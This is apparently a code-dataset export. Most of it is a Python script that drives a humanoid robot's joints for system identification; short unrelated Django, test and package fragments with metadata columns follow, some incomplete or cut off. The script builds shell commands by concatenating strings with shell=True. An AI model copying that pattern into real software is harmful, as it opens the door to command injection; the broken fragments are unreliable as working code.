"lhr" : 7,
"lhp" : 8,
"lk" : 9,
"lap" : 10,
"lar" : 11,
"ty" : 12,
"tp" : 13,
"hy" : 14,
"hp" : 15,
"rsp" : 16,
"rsr" : 17,
"rsy" : 18,
"re" : 19,
"rwy" : 20,
"rwp" : 21,
"rh" : 22,
"lsp" : 23,
"lsr" : 24,
"lsy" : 25,
"le" : 26,
"lwy" : 27,
"lwp" : 28,
"lh" : 29 }
''' Solve the least square problem:
solve y=ax+b in L2 norm
'''
def solve1stOrderLeastSquare(x,y):
Q=np.vstack([np.ones(len(x)),x])
coef = solveLeastSquare(Q.T,y)
(a,b)=coef[1,0],coef[0,0]
return (a,b);
''' Solve the least square problem:
minimize || A*x-b ||^2
'''
def solveLeastSquare(A, b):
return np.linalg.pinv(A)*np.matrix(b).T;
''' Stop the joint when vel is low'''
def gentleStop(traj_gen,joint):
while(abs(traj_gen.dq.value[jID[joint]]) > 0.0001 ):
time.sleep(0.001)
traj_gen.stop(joint)
''' Do N cycles in cost vel or acc with speeds given by times (ex times=[5.0,4.0,3.0])'''
def doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode='constAcc'):
traj_gen.moveJoint(joint,min_pos,3.0)
time.sleep(3.5)
for T in times:
if mode== 'constAcc' :
traj_gen.startConstAcc(joint,max_pos,T)
elif mode== 'constVel':
traj_gen.startTriangle(joint,max_pos,T,0.3)
time.sleep(T*2*N - 1.0)
gentleStop(traj_gen,joint)
traj_gen.moveJoint(joint,min_pos,3.0)
time.sleep(3.5)
#(-0.785398, 0.523599); #// right hip yaw *****************************
def identify_rhy_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rhy_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rhy', -0.0, 0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhr',0.1,3.0)
time.sleep(3.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.610865, 0.349066); #// right hip roll ****************************
def identify_rhr_static(traj_gen,staticTime=60.0):
(joint, min_pos, max_pos) = ('rhr', -0.5, 0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhr',0.25,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rhr_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('rhr', -0.5, 0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rsp',-1.57,5.0)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('re',-1.57,5.0)
traj_gen.moveJoint('le',-1.57,5.0)
traj_gen.moveJoint('lhr',0.25,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-2.18166, 0.733038); #// right hip pitch ***************************:
def identify_rhp_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rhp_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rhp', -1.7, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhr',-0.2,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.0349066, 2.61799); #// right knee ********************************
def identify_rk_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rk_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rk', 0., 2.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-1.309, 0.733038); #// right ankle pitch *************************
def identify_rap_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rap_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rap', -1.2, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.349066, 0.610865); #// right ankle roll **************************
def identify_rar_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rar_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rar', -0.25, 0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.785398, 0.523599); #// left hip yaw *********************INVERTED
def identify_lhy_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lhy_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lhy', +0.0, -0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhr',-0.1,3.0)
time.sleep(3.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.610865, 0.349066); #// left hip roll ********************INVERTED
def identify_lhr_static(traj_gen,staticTime=60.0):
(joint, min_pos, max_pos) = ('lhr', +0.5, -0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhr',-0.25,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lhr_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('lhr', +0.5, -0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('rsp',-1.57,5.0)
traj_gen.moveJoint('le',-1.57,5.0)
traj_gen.moveJoint('re',-1.57,5.0)
traj_gen.moveJoint('rhr',-0.25,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-2.18166, 0.733038); #// left hip pitch ***************************:
def identify_lhp_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lhp_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lhp', -1.7, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('rsp',-1.57,5.0)
traj_gen.moveJoint('le',-1.57,5.0)
traj_gen.moveJoint('re',-1.57,5.0)
traj_gen.moveJoint('lhr',+0.2,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.0349066, 2.61799); #// left knee ********************************
def identify_lk_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lk_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lk', 0., 2.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-1.309, 0.733038); #// left ankle pitch *************************
def identify_lap_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lap_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lap', -1.2, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.349066, 0.610865); #// left ankle roll ******************INVERTED
def identify_lar_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lar_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lar', +0.25, -0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_tp_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('tp', 0., 1.)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_ty_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('ty', -0.7, 0.7)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('rsp',-1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def go_to_zero_position(traj_gen,T=10.0):
# Python interpreter can't deal with input(..) ??
# ret = input('Are you sure you want to put the robot in zero position? All joints will move: [y/N]')
# if ret!="y" :
# print('Cancel zero position')
# return
#put the robot in position q0
# RLEG TO 0 **********************
traj_gen.moveJoint('rhy',0.0,T) #0
traj_gen.moveJoint('rhr',0.0,T) #1
traj_gen.moveJoint('rhp',0.0,T) #2
traj_gen.moveJoint('rk' ,0.0,T) #3
traj_gen.moveJoint('rap',0.0,T) #4
traj_gen.moveJoint('rar',0.0,T) #5
# LLEG TO 0 **********************
traj_gen.moveJoint('lhy',0.0,T) #6
traj_gen.moveJoint('lhr',0.0,T) #7
traj_gen.moveJoint('lhp',0.0,T) #8
traj_gen.moveJoint('lk' ,0.0,T) #9
traj_gen.moveJoint('lap',0.0,T) #10
traj_gen.moveJoint('lar',0.0,T) #11
# TORSO TO 0
traj_gen.moveJoint('ty' ,0.0,T) #12
traj_gen.moveJoint('tp' ,0.0,T) #13
# HEAD TO 0
traj_gen.moveJoint('hy' ,0.0,T) #14
traj_gen.moveJoint('hp' ,0.0,T) #15
# RARM TO 0 **********************
traj_gen.moveJoint('rsp',0.0,T) #16
traj_gen.moveJoint('rsr',0.0,T) #17
traj_gen.moveJoint('rsy',0.0,T) #18
traj_gen.moveJoint('re' ,0.0,T) #19
traj_gen.moveJoint('rwy',0.0,T) #20
traj_gen.moveJoint('rwp',0.0,T) #21
traj_gen.moveJoint('rh' ,0.3,T) #22
# LARM TO 0 **********************
traj_gen.moveJoint('lsp',0.0,T) #23
traj_gen.moveJoint('lsr',0.0,T) #24
traj_gen.moveJoint('lsy',0.0,T) #25
traj_gen.moveJoint('le' ,0.0,T) #26
traj_gen.moveJoint('lwy',0.0,T) #27
traj_gen.moveJoint('lwp',0.0,T) #28
traj_gen.moveJoint('lh' ,0.3,T) #29
def deleteDatFilesInTmp():
call('rm /tmp/*.dat',shell=True)
def stopTracerAndCopyFiles(tracer,directory):
tracer.stop()
tracer.dump()
time.sleep(2.0)
call('mkdir ' + directory, shell=True)
call('mv /tmp/*.dat ' + directory, shell=True)
#deleteDatFilesInTmp()
#tracer = start_tracer(robot, estimator, torque_ctrl, traj_gen, ctrl_manager, inv_dyn, None)
#do your experiment here
#stopTracerAndCopyFiles(tracer,directory='/tmp/JOINT0_ID_static')
| 34.091811
| 104
| 0.635417
| 2,647
| 13,739
| 3.123536
| 0.081602
| 0.047896
| 0.100387
| 0.105104
| 0.737784
| 0.711297
| 0.705975
| 0.704644
| 0.704644
| 0.704282
| 0
| 0.102211
| 0.144043
| 13,739
| 402
| 105
| 34.176617
| 0.60085
| 0.108159
| 0
| 0.60472
| 0
| 0
| 0.041534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097345
| false
| 0
| 0.011799
| 0.00295
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
0a2679d176765c89b3dbefd3621038828bc8384c
| 202
|
py
|
Python
|
watch_list/admin.py
|
Llona/aj-mywatch
|
e25835cd98bcb546de5a12d74e20824616ec76dc
|
[
"CC0-1.0"
] | 1
|
2017-10-20T07:27:50.000Z
|
2017-10-20T07:27:50.000Z
|
watch_list/admin.py
|
Llona/aj-mywatch
|
e25835cd98bcb546de5a12d74e20824616ec76dc
|
[
"CC0-1.0"
] | null | null | null |
watch_list/admin.py
|
Llona/aj-mywatch
|
e25835cd98bcb546de5a12d74e20824616ec76dc
|
[
"CC0-1.0"
] | null | null | null |
from django.contrib import admin
from watch_list.models import Anime, WatchState, News
# Register your models here.
admin.site.register(Anime)
admin.site.register(WatchState)
admin.site.register(News)
| 25.25
| 53
| 0.816832
| 29
| 202
| 5.655172
| 0.517241
| 0.164634
| 0.310976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094059
| 202
| 7
| 54
| 28.857143
| 0.896175
| 0.128713
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
0a414886a17091f215172ada8e75b1c7d3678b65
| 41
|
py
|
Python
|
conftest.py
|
kylewm/redwind
|
7ad807b5ab2dd74a8d470dbea9dd4baf5567d9c6
|
[
"BSD-2-Clause"
] | 35
|
2015-01-08T03:26:39.000Z
|
2020-09-16T00:42:17.000Z
|
conftest.py
|
kylewm/redwind
|
7ad807b5ab2dd74a8d470dbea9dd4baf5567d9c6
|
[
"BSD-2-Clause"
] | 47
|
2015-01-05T23:22:08.000Z
|
2021-02-02T21:43:26.000Z
|
conftest.py
|
kylewm/redwind
|
7ad807b5ab2dd74a8d470dbea9dd4baf5567d9c6
|
[
"BSD-2-Clause"
] | 10
|
2015-02-20T00:51:37.000Z
|
2022-01-11T10:59:32.000Z
|
# lets py.test set the proper PYTHONPATH
| 20.5
| 40
| 0.780488
| 7
| 41
| 4.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 41
| 1
| 41
| 41
| 0.941176
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
0a5f04fac091e7f6b131e0722181b4a3339e69d8
| 26
|
py
|
Python
|
HelloWorld/HelloWorld/__init__.py
|
gp2-why/AI-
|
a2048ad9de4c9a806c1d1437c63548a1f941b71e
|
[
"MIT"
] | null | null | null |
HelloWorld/HelloWorld/__init__.py
|
gp2-why/AI-
|
a2048ad9de4c9a806c1d1437c63548a1f941b71e
|
[
"MIT"
] | null | null | null |
HelloWorld/HelloWorld/__init__.py
|
gp2-why/AI-
|
a2048ad9de4c9a806c1d1437c63548a1f941b71e
|
[
"MIT"
] | null | null | null |
import sqlparse
sqlparse.
| 8.666667
| 15
| 0.846154
| 3
| 26
| 7.333333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 3
| 16
| 8.666667
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
6a75d7a612a0b65cbc41700d99738451d8385f2b
| 44
|
py
|
Python
|
python3/runner/__init__.py
|
digiaonline/python_koans
|
e6264b70a32c6af5d55806cacae37cace363a0b4
|
[
"MIT"
] | 1
|
2020-09-23T06:33:59.000Z
|
2020-09-23T06:33:59.000Z
|
python3/runner/__init__.py
|
digiaonline/python_koans
|
e6264b70a32c6af5d55806cacae37cace363a0b4
|
[
"MIT"
] | null | null | null |
python3/runner/__init__.py
|
digiaonline/python_koans
|
e6264b70a32c6af5d55806cacae37cace363a0b4
|
[
"MIT"
] | 1
|
2020-09-22T11:33:22.000Z
|
2020-09-22T11:33:22.000Z
|
#!/usr/bin/env python
# Namespace: runner
| 8.8
| 21
| 0.681818
| 6
| 44
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 4
| 22
| 11
| 0.810811
| 0.863636
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
6a8c9e2e25b7619a993ba6834bb1a7b2880f7554
| 159
|
py
|
Python
|
shop/basketapp/admin.py
|
SmirnoffRD/django_hw
|
442e8739937db56aac613c2c3d8d1956cde6fe53
|
[
"MIT"
] | null | null | null |
shop/basketapp/admin.py
|
SmirnoffRD/django_hw
|
442e8739937db56aac613c2c3d8d1956cde6fe53
|
[
"MIT"
] | null | null | null |
shop/basketapp/admin.py
|
SmirnoffRD/django_hw
|
442e8739937db56aac613c2c3d8d1956cde6fe53
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Basket, OrderItem
admin.site.register(Basket)
admin.site.register(OrderItem)
# Register your models here.
| 26.5
| 37
| 0.81761
| 22
| 159
| 5.909091
| 0.545455
| 0.138462
| 0.261538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100629
| 159
| 5
| 38
| 31.8
| 0.909091
| 0.163522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
6a92b28a35eb20eb4d11318c0e7bd52261cf7f06
| 96
|
py
|
Python
|
print_odds.py
|
sookoor/PythonInterviewPrep
|
f9862511560894dba39cd06bb82996d1c9d695c6
|
[
"MIT"
] | null | null | null |
print_odds.py
|
sookoor/PythonInterviewPrep
|
f9862511560894dba39cd06bb82996d1c9d695c6
|
[
"MIT"
] | null | null | null |
print_odds.py
|
sookoor/PythonInterviewPrep
|
f9862511560894dba39cd06bb82996d1c9d695c6
|
[
"MIT"
] | null | null | null |
def print_odds(max_num):
print [i for i in xrange(1, max_num + 1) if i % 2]
print_odds(99)
| 19.2
| 54
| 0.65625
| 21
| 96
| 2.809524
| 0.619048
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0.21875
| 96
| 4
| 55
| 24
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
6a9c1f3066528aed9af0973a52f1330988cfffdf
| 287
|
py
|
Python
|
tracking_arm/custom_segmentation/__init__.py
|
NehilDanis/markerless_motion_capture_for_RUSS
|
30f66cea723181f122f15ff861f49d29c8559c95
|
[
"MIT"
] | null | null | null |
tracking_arm/custom_segmentation/__init__.py
|
NehilDanis/markerless_motion_capture_for_RUSS
|
30f66cea723181f122f15ff861f49d29c8559c95
|
[
"MIT"
] | null | null | null |
tracking_arm/custom_segmentation/__init__.py
|
NehilDanis/markerless_motion_capture_for_RUSS
|
30f66cea723181f122f15ff861f49d29c8559c95
|
[
"MIT"
] | 3
|
2021-10-04T13:33:51.000Z
|
2021-11-02T13:54:18.000Z
|
from custom_segmentation.ArmDataLoader import SegmentationDataset
from custom_segmentation.data_handler import get_dataloader_sep_folder, get_dataloader_single_folder
from custom_segmentation.Deeplabv3_pretrained import createDeepLabv3
from custom_segmentation.trainer import train_model
| 71.75
| 100
| 0.926829
| 34
| 287
| 7.441176
| 0.558824
| 0.158103
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00738
| 0.055749
| 287
| 4
| 101
| 71.75
| 0.926199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6ac1188b44ba7394fe1783332c6ae964200c6b0f
| 110
|
py
|
Python
|
utils/measure/light_controller/errors.py
|
KrzysztofHajdamowicz/homeassistant-powercalc
|
374312e21d1c21b28984990442ec56fc52177f4e
|
[
"MIT"
] | 219
|
2021-06-12T20:55:57.000Z
|
2022-03-30T07:56:43.000Z
|
utils/measure/light_controller/errors.py
|
KrzysztofHajdamowicz/homeassistant-powercalc
|
374312e21d1c21b28984990442ec56fc52177f4e
|
[
"MIT"
] | 420
|
2021-06-09T20:22:03.000Z
|
2022-03-31T15:35:45.000Z
|
utils/measure/light_controller/errors.py
|
KrzysztofHajdamowicz/homeassistant-powercalc
|
374312e21d1c21b28984990442ec56fc52177f4e
|
[
"MIT"
] | 84
|
2021-06-09T18:18:03.000Z
|
2022-03-29T09:28:06.000Z
|
class LightControllerError(Exception):
pass
class ModelNotDiscoveredError(LightControllerError):
pass
| 22
| 52
| 0.818182
| 8
| 110
| 11.25
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 110
| 5
| 53
| 22
| 0.9375
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
6ac15251bf4a96249d36a5e3128eab9cb3cd094d
| 83
|
py
|
Python
|
test.py
|
stormalf/file_transfer
|
66fc542931a150bf38732f7d95a0a5e5557fd22e
|
[
"MIT"
] | null | null | null |
test.py
|
stormalf/file_transfer
|
66fc542931a150bf38732f7d95a0a5e5557fd22e
|
[
"MIT"
] | null | null | null |
test.py
|
stormalf/file_transfer
|
66fc542931a150bf38732f7d95a0a5e5557fd22e
|
[
"MIT"
] | null | null | null |
from pySendFile import send_file
send_file(filename="mytext2.txt", testing=True)
| 16.6
| 47
| 0.807229
| 12
| 83
| 5.416667
| 0.833333
| 0.246154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013333
| 0.096386
| 83
| 4
| 48
| 20.75
| 0.853333
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
6ace24f1f83ffcda84de5ee85cb66da8a7c3bab5
| 453
|
py
|
Python
|
hw1/cs285/policies/base_policy.py
|
erfanMhi/Deep-Reinforcement-Learning-CS285-Pytroch
|
6da04f367e52a451c202ae7e5477994c1d149baf
|
[
"MIT"
] | 91
|
2020-06-13T16:26:42.000Z
|
2022-03-31T02:49:30.000Z
|
hw1/cs285/policies/base_policy.py
|
